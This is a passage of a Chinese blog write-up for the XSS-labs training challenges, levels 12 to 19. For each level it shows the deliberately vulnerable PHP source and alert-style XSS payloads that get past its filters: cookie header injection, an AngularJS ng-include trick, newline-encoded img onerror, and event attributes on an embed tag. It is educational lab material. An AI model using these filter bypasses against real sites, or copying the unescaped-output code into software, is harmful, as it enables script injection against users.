<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p><code>&lt;form id=search&gt;</code></p>
<p><code>&lt;input name=&quot;t_link&quot;  value=&quot;&#39;.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_history&quot;  value=&quot;&#39;.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_sort&quot;  value=&quot;&#39;.htmlspecialchars($str00).&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_ua&quot;  value=&quot;&#39;.$str33.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<p>将keyword参数的值赋给了变量str</p>
<p>将t_sot参数的值赋给了变量str00，</p>
<p>将请求中User-Agent头的值赋给了变量str11,。</p>
<p>将变量str11的值中存在的&lt;和&gt;删除之后直接插入到了t_ua标签的value</p>
<p>属性值中。</p>
<p>在这里变量str和str00的值都是需要被htmlspecialchars()函数处理过</p>
<h2 id="level-13"><a href="#level-13" class="headerlink" title="level 13"></a>level 13</h2><p>13关猜测还是与数据头有关</p>
<p><img src="https://img-blog.csdnimg.cn/2020072419061647.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dvNDFnZQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.35qn41zq4fs0.webp"></p>
<p>可以看到，是将cookies里的值放入了t_cook中，修改为恶意代码</p>
<h4 id="payload-10"><a href="#payload-10" class="headerlink" title="payload"></a>payload</h4><p><code>Cookie: user=1&quot; type=&quot;text&quot; onclick=&quot;alert(1)&quot;</code></p>
<h4 id="源代码-10"><a href="#源代码-10" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>setcookie(&quot;user&quot;, &quot;call me maybe?&quot;, time()+3600);</code></p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;keyword&quot;];</code></p>
<p><code>$str00 = $_GET[&quot;t_sort&quot;];</code></p>
<p><code>$str11=$_COOKIE[&quot;user&quot;];</code></p>
<p><code>$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);</code></p>
<p><code>$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);</code></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p><code>&lt;form id=search&gt;</code></p>
<p><code>&lt;input name=&quot;t_link&quot;  value=&quot;&#39;.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_history&quot;  value=&quot;&#39;.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_sort&quot;  value=&quot;&#39;.htmlspecialchars($str00).&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_cook&quot;  value=&quot;&#39;.$str33.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<h2 id="level-14"><a href="#level-14" class="headerlink" title="level 14"></a>level 14</h2><p>修改iframe调用的文件来实现xss注入(但因为iframe调用的文件地址失效，无法进行测试</p>
<h2 id="level-15"><a href="#level-15" class="headerlink" title="level 15"></a>level 15</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.62eyhguere00.webp"></p>
<p>可以看到我们提交的src参数被插入到了<code>&lt;span&gt;</code>标签的<code>class</code>属性值中，但是前面还有<code>ng-include</code>这样的字符。</p>
<p><code>ng-include</code>是<code>angular js</code>中的东西，其作用相当于php的include函数。这里就是将<code>1.gif</code>这个文件给包含进来。</p>
<h4 id="ng-include相关知识点"><a href="#ng-include相关知识点" class="headerlink" title="ng-include相关知识点"></a>ng-include相关知识点</h4><p><strong>1、ng-include 指令用于包含外部的 HTML文件。</strong></p>
<p><strong>2、包含的内容将作为指定元素的子节点。</strong></p>
<p><strong>3、ng-include 属性的值可以是一个表达式，返回一个文件名。</strong></p>
<p><strong>4、默认情况下，包含的文件需要包含在同一个域名下。</strong></p>
<p><strong>特别值得注意的几点如下：</strong></p>
<p><strong>1.ng-include,如果单纯指定地址，必须要加引号</strong></p>
<p><strong>2.ng-include,加载外部html，script标签中的内容不执行</strong></p>
<p><strong>3.ng-include,加载外部html中含有style标签样式可以识别</strong></p>
<p>构造函数<br>?src&#x3D;’level1.php?name&#x3D;<img src=1 onerror=alert(1)>‘<br>因为这里参数值算是一个地址，所以需要添加引号。</p>
<p>但是level1.php不是一个php文件吗？</p>
<p>这里解释一下，这是因为我们不是单纯的去包含level1.php，而是在后面添加了name参数值的。这就有点像是在访问了该参数值中地址之后把它响应在浏览器端的html文件给包含进来的意思。</p>
<h4 id="payload-11"><a href="#payload-11" class="headerlink" title="payload"></a>payload</h4><p><code>?src=&#39;level1.php?name=&lt;img src=1 onerror=alert(1)&gt;&#39;</code></p>
<h4 id="源代码-11"><a href="#源代码-11" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;src&quot;];</code></p>
<p><code>echo &#39;&lt;body&gt;&lt;span class=&quot;ng-include:&#39;.htmlspecialchars($str).&#39;&quot;&gt;&lt;/span&gt;&lt;/body&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<h2 id="level-16"><a href="#level-16" class="headerlink" title="level 16"></a>level 16</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.oadka56x0bk.webp"></p>
<p>可以看到，我们输入的值被插到了<center>标签中，我们尝试直接弹窗，发现很多字符被编码，来看看源代码</p>
<h4 id="源代码-12"><a href="#源代码-12" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = strtolower($_GET[&quot;keyword&quot;]);</code></p>
<p><code>$str2=str_replace(&quot;script&quot;,&quot;&amp;nbsp;&quot;,$str);</code></p>
<p><code>$str3=str_replace(&quot; &quot;,&quot;&amp;nbsp;&quot;,$str2);</code></p>
<p><code>$str4=str_replace(&quot;/&quot;,&quot;&amp;nbsp;&quot;,$str3);</code></p>
<p><code>$str5=str_replace(&quot; &quot;,&quot;&amp;nbsp;&quot;,$str4);</code></p>
<p><code>echo &quot;&lt;center&gt;&quot;.$str5.&quot;&lt;/center&gt;&quot;;</code></p>
<p><code>?&gt;</code></p>
<p><code>&lt;center&gt;&lt;img src=level16.png&gt;&lt;/center&gt;</code></p>
<p><code>&lt;?php</code> </p>
<p><code>echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str5).&quot;&lt;/h3&gt;&quot;;</code></p>
<p><code>?&gt;</code></p>
<p>可以看到，将参数值中的script替换成&amp;nbsp;，将参数值中的空格也替换成&amp;nbsp;，将参数值中的&#x2F;符号替换成&amp;nbsp;</p>
<p>与我们的猜想一致</p>
<p>绕过思路：可以用回车来将它们分开。</p>
<p>而且这里&#x2F;符号也被编码了，所以我们需要的是一个不需要闭合的标签，比</p>
<p>如之前所用过的<img></p>
<img src="111" onerror=alert(‘xss’) >

<p>回车可以用url编码%0a表示</p>
<h4 id="payload-12"><a href="#payload-12" class="headerlink" title="payload"></a>payload</h4><p><code>&lt;img%0Asrc=1%0Aonerror=alert(1)&gt;</code></p>
<h2 id="level-17"><a href="#level-17" class="headerlink" title="level 17"></a>level 17</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.79mvat1x84c.webp"></p>
<p>可以看到提交的参数插入到了<embed>标签的src属性中，尝试直接弹窗，发现转义了很多符号。</p>
<p>尝试构造事件弹窗，可以看到这里的src没有用引号闭合，我们就不用管</p>
<h4 id="payload-13"><a href="#payload-13" class="headerlink" title="payload"></a>payload</h4><p><code>onclick=alert(&#39;xss&#39;)</code></p>
<pre><code>onmousedown=&#39;alert(1)&#39;
</code></pre>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.2jxajvtwct40.webp"></p>
<h4 id="源代码-13"><a href="#源代码-13" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code>·</p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>echo &quot;&lt;embed src=xsf01.swf?&quot;.htmlspecialchars($_GET[&quot;arg01&quot;]).&quot;=&quot;.htmlspecialchars($_GET[&quot;arg02&quot;]).&quot; width=100% heigth=100%&gt;&quot;;</code></p>
<p><code>?&gt;</code></p>
<p>可以看到和我们的猜测一致</p>
<h2 id="level-18"><a href="#level-18" class="headerlink" title="level 18"></a>level 18</h2><p>与17关一致</p>
<h2 id="level-19"><a href="#level-19" class="headerlink" title="level 19"></a>level 19</h2><p>与之前一致，不过用了引号将src闭合，所以不能直接在后面添加语句，我们可以通过F12控制台添加</p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li>本文标题：XSS-labs通关笔记</li>
        <li>本文作者：n3ym4r</li>
        <li>创建时间：2020-04-07 21:55:14</li>
        <li>
            本文链接：https://n3ym4r.github.io/2020/04/07/xss-labs通关笔记/
        </li>
        <li>
            版权声明：本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/%E7%AC%94%E8%AE%B0/">#笔记</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2020/04/07/sql%E6%B3%A8%E5%85%A5/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">SQL注入学习笔记</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2020</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">n3ym4r</a>
            
        </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题
            &nbsp;
            <a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.9</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-up-right-and-down-left-from-center"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#XSS-labs%E9%80%9A%E5%85%B3%E7%AC%94%E8%AE%B0"><span class="nav-text">XSS-labs通关笔记</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#level-1"><span class="nav-text">level 1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-text"> </span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E6%BA%90%E4%BB%A3%E7%A0%81"><span class="nav-text">服务器端源代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-2"><span class="nav-text">level 2</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E6%BA%90%E4%BB%A3%E7%A0%81-1"><span class="nav-text">服务器端源代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-3"><span class="nav-text">level 3</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#payload"><span class="nav-text">payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81"><span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#htmlspecialchars"><span class="nav-text">htmlspecialchars ()</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-4"><span class="nav-text">level 4</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-1"><span class="nav-text">payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-1"><span class="nav-text">源代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-5"><span class="nav-text">level 5</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-2"><span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-2"><span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-6"><span class="nav-text">level 6</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-3"><span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-3"><span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-7"><span class="nav-text">level 7</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-4"><span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-4"><span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-8"><span class="nav-text">level 8</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-5"><span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-5"><span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-9"><span class="nav-text">level 9</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-6"><span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-6"><span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-10"><span class="nav-text">level 10</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-7"><span class="nav-text">payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-7"><span class="nav-text">源代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-11"><span class="nav-text">level 11</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-8"><span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-8"><span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-12"><span class="nav-text">level 12</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-9"><span class="nav-text">payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-9"><span class="nav-text">源代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-13"><span class="nav-text">level 13</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-10"><span class="nav-text">payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-10"><span class="nav-text">源代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-14"><span class="nav-text">level 14</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-15"><span class="nav-text">level 15</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ng-include%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="nav-text">ng-include相关知识点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-11"><span class="nav-text">payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-11"><span class="nav-text">源代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-16"><span class="nav-text">level 16</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-12"><span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-12"><span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-17"><span class="nav-text">level 17</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-13"><span class="nav-text">payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BA%90%E4%BB%A3%E7%A0%81-13"><span class="nav-text">源代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-18"><span class="nav-text">level 18</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-19"><span class="nav-text">level 19</span></a></li></ol></li></ol>
    </div>
</div>
        </aside>
    

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/code-block-tools.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/left-side-toggle.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/toc.js"></script>
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
